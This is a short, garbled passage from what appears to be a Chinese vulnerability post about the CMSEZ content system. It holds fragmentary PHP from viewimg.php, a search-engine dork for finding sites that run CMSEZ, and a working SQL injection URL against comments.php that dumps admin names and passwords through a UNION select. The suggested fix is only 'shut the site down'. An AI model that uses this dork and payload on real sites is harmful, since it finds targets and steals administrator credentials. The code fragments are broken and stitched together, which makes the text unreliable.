document.close;";
;
"saveComment":
--------------
viewimg.php
--------------
<?
//image.php 显示附件图片
"file.php";
$user_info[user_level]"Guest" && $confirmtrue){
"modules/member/index.php";
}{
sql="select id from $imgdb where aid=$aid order by id ";
---------------------
exp:
allinurl:"owered by CMSEZ" comments.php inurlowered by CMSEZ
http://localhost/comments.php?id=1111111111111/**/union/**/1,concat(name,0x3a,pass),2,3,4/**/from/**/admin/*
-------------------
修复方案:
最好把站关了...
最新评论